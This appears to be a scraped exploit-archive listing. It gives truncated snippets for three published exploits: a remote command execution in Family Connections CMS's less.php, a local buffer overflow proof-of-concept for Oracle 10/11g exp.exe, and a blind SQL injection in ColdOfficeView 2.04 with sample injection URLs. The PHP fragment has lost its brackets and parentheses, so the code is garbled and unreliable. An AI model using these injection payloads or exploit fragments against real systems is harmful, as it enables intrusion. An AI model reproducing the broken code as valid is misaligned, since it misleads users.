Family Connections CMS 2.5.02.7.1 - less.php Remote Command Execution

Family Connections CMS 2.5.02.7.1 - less.php Remote Command Execution $theme = isset$argv1 ? $argv1 : 'default'; system"clear"; if fileexists"$dir/themes/$theme/style.css" echo "\n themes/$theme/style.css already exists.\n\n"; echo "Overwrite y/n ? "; $handle = fopen "php://stdin","r"; $line =...

Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow

!/usr/bin/python Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit Date found approx: 9/3/2010 Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html Version: 10.x and 11g r1 r2 untested Tested on: Windows XP SP3 En Usage: $ORACLEHOME\exp.exe...

ColdOfficeView 2.04 Blind SQL Injection

ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities Vendor: http://www.coldgen.com/ Found by: mrme net-ninja.net PoC's 1. http://target/path/index.cfm?fuseaction=ViewEventDetails&EventID=Blind SQLi http://target/path/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 tr...